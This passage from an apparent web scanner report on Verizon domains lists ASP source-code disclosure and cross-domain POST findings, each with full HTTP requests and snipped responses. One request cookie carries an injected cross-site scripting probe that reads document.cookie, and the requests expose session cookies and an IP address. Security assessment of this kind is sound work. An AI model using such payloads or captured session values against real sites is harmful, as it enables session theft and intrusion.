The application appears to disclose some server-side source code written in ASP.

Request

GET /Residentialhelp/includes/javascript/TopLevelTab.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Content-Length: 45226
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Aug 2011 09:35:52 GMT
Accept-Ranges: bytes
ETag: "08c4a61a63cc1:5688"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:24:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:09 GMT
Connection: close

/*
***************************************************************************
       -TopLevelTabControl Functionality
       -Coded by Harmeet/Aga/Nagesh/Gopal

Main functionalities:


...[SNIP]...
r)
{
//debugger;
try{
var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;
   
if(activeTab.toLowerCase()=="internet")
{
document.getElementById('SuTab2').className='AcRTabM';
docu
...[SNIP]...
r)
{
// debugger;
try{
var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;
   
if(activeTab.toLowerCase()=="internet")
{
document.getElementById('TopMenu1').className='subnavcurrent launcher';

...[SNIP]...

12.13. http://www22.verizon.com/content/contactus/includes/javascript/TopLevelTab.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /content/contactus/includes/javascript/TopLevelTab.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /content/contactus/includes/javascript/TopLevelTab.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/ContactUs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39

Response

HTTP/1.0 200 OK
Content-Length: 36192
Content-Type: application/x-javascript
Last-Modified: Fri, 03 Jun 2011 15:18:56 GMT
Accept-Ranges: bytes
ETag: "07068e122cc1:6f2e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:38:27 GMT
Connection: close


       /*
***************************************************************************
       -TopLevelTabControl Functionality
       -Coded by Harmeet/Aga/Nagesh/Gopal

Main functionalities:


...[SNIP]...
ompop,solncenter)
{


var url = "" + window.location;
var queryStringIndex = url.indexOf('=') + 1;
    //var activeTab = url.substr(queryStringIndex);
    //var activeTab = <%=tab%>
    tabSelectedVal=activeTab;
   
if(activeTab.toLowerCase()=="internet")
{
document.getElementById('TopMenu1').className='subnavcurrent launcher';

...[SNIP]...

12.14. https://www22.verizon.com/Content/verizonglobalhome/Includes/Javascript/common.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www22.verizon.com
Path:   /Content/verizonglobalhome/Includes/Javascript/common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Content/verizonglobalhome/Includes/Javascript/common.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Content-Length: 20021
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 22:05:28 GMT
Accept-Ranges: bytes
ETag: "084291f9750cc1:7836"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:19:47 GMT
Connection: keep-alive

var req ;
var t1;
var cufOff = false;
var xpDecisions="";
var cid1="";
var cid2="";
var cid3="";
var cid4="";
var objAjax=null;
var clickreq;
var TryCountAjax = 0;
var TryCountD = 0;

var
...[SNIP]...
<4)
           {
               TryCountAjax=TryCountAjax+1;
               setTimeout(sPromo,2000);                    
           }
}
}


//Ajax Call xmlhttprequest -Logging start
//var chkXplus1log = "<%=chkXplus1Log%>";
var chkXplus1log = 'true';

function CallAjax(placements)
{
   if(chkXplus1log == 'true')
   {
    Createobj();
xlogParam = "xLogParam="+escape(placements) + "**" + escape(xp1src)
...[SNIP]...

12.15. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www22.verizon.com
Path:   /FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com

Response

HTTP/1.0 200 OK
Content-Length: 21389
Content-Type: application/x-javascript
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Includes/js/Common.js
Last-Modified: Thu, 01 Sep 2011 17:52:00 GMT
Accept-Ranges: bytes
ETag: "0204bd9cf68cc1:615d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:25:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:06 GMT
Connection: keep-alive

/* global constants */
var IMAGEFOLDER = "../Common/images/";
/* Javscript code moved from ascx to this page */
/* From tos.ascx */
var FirstTimeIndex = true;
var sPlatformIndex = '<%=sOSPlatform%>';

function onChange()
           {    
           
               var highspeed= '<%=sHighSpeed%>'; //fios high speed
               var fiftymbps= '<%=sFiftyMbps%>'; //fios high speed
               var VD    = '<%=IsVDSL%>';
               var state = '<%=_state%>';
               var OSIndex = '<%=sOSPlatform%>';            
               var FiosSpeedIndex=1,counter;        
               if(document.forms[0].operating01 != null)
               switch(document.forms[0].operating01.selectedIndex)
               {
               case 0:
return; break
...[SNIP]...
ease use the 'Contact Us' link below." ){        
       
       
               var url ='../Common/OrderInsertComments.aspx?Comments=' + escape(filterSpecialChars(document.forms[0].Comments.value)) + '&PS_PageURI=' + '<%=pageUrl%>' + '&TelNo=' + '<%=btn%>' + '&SesID=' + '<%=sessionId%>' + '&AppID=' + '<%=appId%>' + '&fttpavail=' + '<%=fttpAvail%>' + '&fttpSel=' + '<%=fttpSel%>';

       mywindow = window.open(url, '_blank','location=no,menubar=no,status=no,titlebar=no,directories=no,toolbar=no,left=1000,top=1000,width=100,height=100');
       
       
                       document.forms[0].
...[SNIP]...

13. Cross-domain POST
There are 10 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


13.1. http://b2b.vzw.com/industrysolutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b2b.vzw.com
Path:   /industrysolutions/index.html

Issue detail

The page contains a form which POSTs data to the domain enterprisecenter.verizon.com. The form contains the following fields:

Request

GET /industrysolutions/index.html HTTP/1.1
Host: b2b.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive



...[SNIP]...
<div class="login_content hidden">
<form name="vzeForm" id="vzeForm" method="post" action="https://EnterpriseCenter.verizon.com/enterprisesolutions/Default/login.fcc">
<div class="fixer_10">
...[SNIP]...

13.2. http://b2b.vzw.com/industrysolutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b2b.vzw.com
Path:   /industrysolutions/index.html

Issue detail

The page contains a form which POSTs data to the domain mblogin.verizonwireless.com. The form contains the following fields:

Request

GET /industrysolutions/index.html HTTP/1.1
Host: b2b.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.3
Content-Type: text/html
X-Cacheable: NO: !obj.cacheable
Content-Length: 20859
Date: Mon, 05 Sep 2011 21:56:40 GMT
X-Varnish: 1491768482
Age: 0
Via: 1.1 varnish
Connection: keep-alive



...[SNIP]...
<div class="login_content">
<form name="myaccountForm" id="myaccountForm" method="post" action="https://mblogin.verizonwireless.com/amserver/UI/Login?realm=vzwmb">
<input type="hidden" name="rememberUserNameCheckBoxExists" value="Y" />
...[SNIP]...

13.3. http://www.connecttoverizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...

13.4. http://www.connecttoverizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...
<div class="inside-arrow">
<form action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/selfRegister" id="selfReg" name="selfReg" method="post" class="form-new">
<div id="streetAddress-wrapper" class="inputField">
...[SNIP]...

13.5. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Issue detail

The page contains a form which POSTs data to the domain www.whitefence.com. The form contains the following fields:

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...
<div id="returning-users">
<form name="form1" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login"
method="post" >

<div id="username" >
...[SNIP]...

